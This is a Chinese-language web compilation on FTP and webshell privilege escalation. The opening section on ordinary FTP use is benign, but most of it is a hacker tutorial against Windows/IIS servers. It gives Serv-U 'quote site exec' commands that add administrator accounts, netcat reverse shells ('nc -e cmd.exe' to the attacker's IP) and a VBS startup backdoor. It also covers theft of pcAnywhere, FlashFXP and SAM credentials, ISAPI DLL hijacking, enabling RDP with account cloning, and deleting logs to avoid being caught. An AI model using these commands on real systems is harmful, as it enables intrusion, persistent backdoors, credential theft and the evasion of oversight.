ftp提權怎麼做
㈠ 怎麼知道ftp的用戶名和密碼
如何知道自己網站的FTP用戶名跟密碼?
FTP格式為:ftp://用戶名:密碼@地址:埠/(如果默認埠是21則不需要填寫埠)
比如:ftp://test:[email protected]:21/profile
1、用戶名和密碼為:test、test。
2、伺服器IP和port為:192.168.0.1:21
3、登錄後轉到profile文件夾
輸入FTP用戶名和密碼操作方法如下:
1、打開瀏覽器,在地址欄中輸入ftp://伺服器IP地址。然後回車。
2、這時候會出現一個驗證界面,需要輸入分配的用戶名和密碼。沒有話就不能訪問了,輸入後點擊登錄。
3、接下來就進入了FTP伺服器中,就可以進行文件的上傳和下載了。
拓展資料:
FTP是FileTransferProtocol(文件傳輸協議)的英文簡稱,而中文簡稱為「文傳協議」。用於Internet上的控制文件的雙向傳輸。同時,它也是一個應用程序(Application)。
基於不同的操作系統有不同的FTP應用程序,而所有這些應用程序都遵守同一種協議以傳輸文件。在FTP的使用當中,用戶經常遇到兩個概念:"下載"(Download)和"上傳"(Upload)。
"下載"文件就是從遠程主機拷貝文件至自己的計算機上;"上傳"文件就是將文件從自己的計算機中拷貝至遠程主機上。用Internet語言來說,用戶可通過客戶機程序向(從)遠程主機上傳(下載)文件。
ftp伺服器密碼忘記怎麼辦?
瀉葯不用reset鍵是可以的1,如果你有USB轉ttl線,拆機接ttl連電腦,通過ttl通信讀取快閃記憶體數據2,如果你有晶元編程器,熱風槍取下快閃記憶體,丟編程器讀數據3,如果你給路由器的ftp設置了最高許可權並且記得FTP的賬號密碼,那麼可以嘗試通過FTP讀取數據4,還有個高難度辦法,如果路由器端運行著某些擁有額外網頁控制的插件比如plex,可以考慮通過插件然後提權讀數據,不過不保證成功,這是迫不得已下的可以嘗試的辦法我一般用方法1,ttl大法真痛快
ftp查看方式?
1、打開我的電腦,在地址欄里輸入FTP地址,如:ftp://225.123.256.32出現對話框
2、使用瀏覽器訪問,即在瀏覽器地址欄里輸入FTP地址,如:ftp://225.123.256.32
3、按win+R,鍵入ftp地址,如ftp://225.123.256.32/
4.使用FTP軟體訪問,如CuteFTP,8UFTP等
若要想對訪問到的ftp伺服器里的文件做操作,那麼就需要在具有許可權的情況下,
可以通過在ftp訪問地址上連帶上用戶名密碼來使其具有許可權,如ftp訪問地址時:ftp://username:[email protected]
或是使用軟體,軟體中輸入用戶名密碼即可操作。
另外,也可以在cmd中使用命令行操作
ftp匿名賬號是什麼?
匿名賬號為anonymous,使用FTP時必須首先登錄,在遠程主機上獲得相應的許可權以後,方可上傳或下載文件。
也就是說,要想同哪一台計算機傳送文件,就必須具有哪一台計算機的適當授權。換言之,除非有用戶ID和口令,否則便無法傳送文件。比如你想下載一個ftp空間里的文件,你必須有賬戶名密碼才可以下載,而用戶可通過它連接到遠程主機上,並從其下載文件,而無需成為其注冊用戶。系統管理員建立了一個特殊的用戶ID,名為anonymous,Internet上的任何人在任何地方都可使用該用戶ID。這樣就可以下載該文件了。
xp系統如何設置ftp的密碼和賬戶?
XP系統上搭建FTP的方法如下:
1、首先下載iis軟體包,打開瀏覽器開始搜索iis軟體包,注意是xp系統的iis軟體包哦!壓縮後的iis軟體包大約是11M左右
2、查找適合xp系統的iis軟體包,下載,安裝即可。
3、現在開始安裝iis,單擊開始菜單,選擇「控制面板」
4、選擇「添加和刪除程序」
5、、點擊「添加或刪除windows組件」,選擇添加「Internet信息服務」,文件選擇開始下載的iis文件包即可。
6、開始安裝iis,並選擇「ftp文件傳輸協議」。在安裝過程中,會提示多次選擇文件,選擇下載的iis文件包即可。
7、用滑鼠選擇電腦,然後單擊滑鼠右鍵選擇「管理」
8、在ftp站點上單擊滑鼠右鍵選擇屬性,開始配置ftp站點。
9、配置完成後,現在就可以去試試用ftp上傳和下載文件了。
㈡ 關於WEBSHLL提權
關於提權的方法太多,偶逃了兩節課整理出下面幾點偶輔導員不會看到了吧
一:利用serv-u本地提權.使用最頻繁..所有提權中成功率最高.
工具ftp.exe
c:\winnt\system32\inetsrv\data\
C:\Documents and Settings\All Users\Documents
站點根目錄
二:修改d:\Program Files\serv-u目錄下的ServUDaemon.ini來提權
[USER=angel|1]
Password=
HomeDir=D:\websites
RelPaths=1
TimeOut=600
Maintenance=System
Access1=D:\websites|RWAMELCDP
SKEYValues=
用戶是angel 密碼是 111111
在本地cmd上進行ftp命令
c:\>ftp ip
ftp>quote site exec net user 123$ 123456 /add
ftp>quote site exec net localgroup administrators 123$ /add
再在站點根目錄上傳nc.exe進行反向連接
ftp>quote site exec d:\wwwroot\bbs\nc 自己ip 2005 >> nc -e cmd.exe (此時用nc再監聽一個埠nc -l -p 2005)
三:通過資料庫連接文件獲取資料庫賬號密碼提升許可權
編輯在根目錄下查找文件conn.asp
查找sqlUsername 和 sqlPassword
用sqltools連接
四:通過寫腳本到啟動項目
C:\Documents and Settings\All Users\開始\程序\啟動\
五:通過pcanywhere提權
賬號密碼存放在
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
下載cif結尾的文件..然後破解..上去以後直接
webshell提權補充 - -
話說到花了九牛二虎的力氣獲得了一個webshell,
當然還想繼續獲得整個伺服器的admin許可權,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我來,看看有什麼可以利用的來提升許可權
****************************************************************************
第一
如果伺服器上有裝了pcanywhere服務端,管理員為了管理方便
也給了我們方便,到系統盤的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下載*.cif本地
破解就使用pcanywhere連接就ok了
****************************************************************************
第二
有很多小黑問我這么把webshell的iis user許可權提升
一般伺服器的管理都是本機設計完畢然後上傳到空間里,
那麼就會用到ftp,伺服器使用最多的就是servu
那麼我們就利用servu來提升許可權
通過servu提升許可權需要servu安裝目錄可寫~
好開始把,首先通過webshell訪問servu安裝文件夾下的ServUDaemon.ini把他下載
下來,然後在本機上安裝一個servu把ServUDaemon.ini放到本地安裝文件夾下覆蓋,
啟動servu添加了一個用戶,設置為系統管理員,目錄C:\,具有可執行許可權
然後去servu安裝目錄里把ServUDaemon.ini更換伺服器上的。
用我新建的用戶和密碼連接~
好的,還是連上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //剛才添加的用戶
331 User name okay, please send complete E-mail address as password.
Password:password //密碼
230 User logged in, proceed.
ftp> cd winnt //進入win2k的winnt目錄
250 Directory changed to /WINNT
ftp>cd system32 //進入system32目錄
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系統的net.exe
文件加用戶。
如果提示沒有許可權,那我們就
把後門(server.exe) 傳他system32目錄
然後寫一個VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)
存為xx.vbe
這個教本的作用是建立user用戶密碼為pass
並且提升為管理員
然後執行system32目錄下的server.exe
把這個教本傳他 C:\Documents and Settings\All Users\「開始」菜單\程序\啟動
目錄
這樣管理員只要一登陸就會執行那個教本.
接下來就是等了.等他登陸.
****************************************************************************
第三
就是先檢查有什麼系統服務,或者隨系統啟動自動啟動的程序和管理員經常使用的軟體, 比如諾頓,VAdministrator,金山,瑞星,WinRAR甚至QQ之類的,是否可以寫,如果可以就修改其程序, 綁定一個批處理或者VBS,然後還是等待伺服器重啟。
****************************************************************************
第四
查找conn和config ,pass這類型的文件看能否得到sa或者mysql的相關密碼,可能會有所
收獲等等。
****************************************************************************
第五
使用Flashfxp也能提升許可權,但是成功率就看你自己的運氣了
首先找到FlashFXP文件夾,打開(編輯)Sites. dat,這個文件這是什麼東西密碼和用戶名,
而且密碼是加了密的。 如果我把這些文件回本地也就是我的計算機中,替換我本地的相應文件。然後會發現 打開flashfxp在站點中打開站點管理器一樣。又可以添加N多肉雞啦~~嘻嘻~
唔??不對啊,是來提升許可權的啊,暈,接著來別半途而廢。
大家看看對方管理員的這站點管理器,有用戶名和密碼,密碼是星號的。經過用xp星號密碼 查看器查看,然後和Sites.dat中加密了密碼做比較發現並未加密而是查到的密碼是明文顯示, 然後最終把這個網站管理員的密碼從這堆東西中找
出來。那麼下一步就可以鏈接這些新的伺服器啦~~
經過測試只要把含有密碼和用戶名的Sites.dat文件替換到本地相應的文件就可以在本地
還原對方管理員的各個站點的密碼。
****************************************************************************
第六
WIN2K+IIS5.0默認情況下應用程序保護選項是"中(共用的)",這時IIS載入isapi是用的
iwam_computername用戶身份執行。
但默認情況下WIN2K+IIS5對於一些特殊isapi又要以system身份載入。win2k+iis5 、
win2k+iis5+sp1、win2k+iis5+sp2都是簡單的判斷isapi的文件名,並且沒有做目錄限制,
以SYSTEM許可權載入的isapi有:
1、 idq.dll
2、 httpext.dll
3、 httpodbc.dll
4、 ssinc.dll
5、 msw3prt.dll
6、 author.dll
7、 admin.dll
8、 shtml.dll
9、 sspifilt.dll
10、compfilt.dll
11、pwsdata.dll
12、md5filt.dll
13、fpexedll.dll
所以利用這很容易得到SYSTEM許可權。並且判斷文件名的時候有個bug,比如請求/scripts/test%81%5cssinc.dll也將會認為是請求的ssinc.dll,就是分離文件路徑的時候沒有考慮到雙位元組的 遠東版問題。ssinc.dll在處理包含文件路徑的時候也有一個問題,就是"/"、"\"只識別了一個 "/",所以如果請求裡面使用"\",就會錯誤的處理包含文件路徑,有可能泄露東西或者出現許可權 漏洞,這種漏洞很多別的地方( php、asp等)也還存在。
載入這些isapi不是單以文件名做依據了,而是加了路徑,應該是修正了此問題。
一般默認情況下是:
1、 idq.dll d:\winnt\system32\idq.dll
2、 httpext.dll d:\winnt\system32\inetsrv\httpext.dll
3、 httpodbc.dll d:\winnt\system32\inetsrv\httpodbc.dll
4、 ssinc.dll d:\winnt\system32\inrtsrv\ssinc.dll
5、 msw3prt.dll d:\winnt\system32\msw3prt.dll
6、 author.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\author.dll
7、 admin.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admin.dll
8、 shtml.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\shtml.dll
9、 sspifilt.dll d:\winnt\system32\inetsrv\sspifilt.dll
10、compfilt.dll d:\winnt\system32\inetsrv\compfilt.dll
11、pwsdata.dll d:\winnt\system32\inetsrv\pwsdata.dll
12、md5filt.dll d:\winnt\system32\inetsrv\md5filt.dll
13、fpexedll.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedll.dll
正常情況下這些路徑都guest不能寫,但如果配置不好,這些路徑iis user能夠寫了就一樣可以提升許可權了
可以把ISAPIHack.dll上傳到IIS的可執行目錄,文件名可叫ssinc.dll或者admin.dll等(上面列的13個文件名之一)。
然後等待IIS重啟載入此dll,就可以獲得許可權了
****************************************************************************
第七
下載系統的 %windir%\repair\sam.*(WinNT 4下是sam._ 而Windows 2000下是sam)文件,
然後用L0pht等軟體進行破解,只要能拿到,肯花時間,就一定可以破解。
****************************************************************************
第八
PipeUpAdmin(Windows 2000下), 在本機運行可以把當前用戶帳號加入管理員組。普通用戶和Guests組用戶都可以成功運行。 第九
Serv-u Ftp Server 本地許可權提升漏洞:
很多主機的C:\Documents and Settings\All Users\ Documents目錄以及下邊幾個子目錄Documents沒有設置許可權,導致可以在這個目錄上傳並運行Exp. 直接上傳了serv-u local exploit 和nc, 並且把serv-u的本地提升許可權的名字命名為su.exe 文件就放在C:\Documents and Settings\All Users\ Documents, 然後我們用su.exe直接建立用戶,也可以反彈一個shell過來的。
具體命令:
建立用戶: serv-u.exe "cmd"
>USER xl
>PASS 111111
反彈shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
㈢ ftp提權的問題
開始 要提權 首先得看看這里 伺服器信息-組件支持 一般提權都會利用到這個
wscript.shell √ 命令行執行組件
在看看這里 開了終端了 有時候沒開也會顯示3389
個人愛好 提權的時候先看看有沒有FTP 還有有沒有開啟終端的
方法比較簡單 看操作 CMD裡面輸入命令FTP 目標地址 顯示Serv-U FTP Server v6.2
有開FTP 而且是6.2版本的 有利用價值 這個讓我們想到FTP的提權
連得上 說明開著 (小提示 如果沒連得上有可能是改埠了 也有可能是沒開 可以用掃描器掃一下)
接著上傳一個ASP的提權腳本 lake大哥的 大家都熟悉吧 都英文來的
我簡單說明一下就好了 Add User 這里是添加 Del User 刪除
RUN提交 上面的默認不用修改 FTP user lake pass admin123 添加了
FTP帳號 lake 密碼 admin123
連連 呵呵 進去了 說明添加帳戶成功 接下來呢 就添加管理員帳號了 如果沒開終端的話 也可以現在開
說明一下 現在添加的這個lake帳戶是具有管理許可權的哦 用到下面的命令
quote site exec net user shayu 83073645 /add添加用戶
200 EXEC command successful (TID=33).
成功 繼續添加許可權
200 EXEC command successful (TID=33) OK了
伺服器的3389已經被我開過了 我簡單演示一下怎麼開就OK了
用到一個工具AIO.exe 對了還得看看對方的機子是什麼系統才好開3389 我已經事先看了
集體的是在WEBSHELL裡面用CMD命令 VER 就可以知道了 沒許可權的話就自己傳個CMD過去
現在看操作 我用工具傳過去比較方便點
命令 quote site exec Aio.exe -Terminal 3389
在這里輸入 不過注意下 那個是FTP下運行的命令 所以要在前面加上quote site exec這個才可以
OK 開了 在用這個命令Aio.exe -Clone Administrator Guest 83073645克隆帳戶 也可以用之前的直接
登陸也可以 OK 到這里提權就完畢了 接下來的自由發揮了
走的時候別忘了擦PP咯 不然給人抓了 我可不管了 那邊的是我用GUEST帳號登陸的 忽忽
清楚系統的日誌掉了 可以的話 大家自己找找WEB的日誌還有FTP的都要刪除掉 我就不演示了
就到這里 88咯
相關命令:
Aio.exe -Clone Administrator Guest 83073645
Aio.exe -Terminal 3389
ftp提權命令:quote site exec net user shayu 83073645 /add
quote site exec net localgroup administrators shayu /add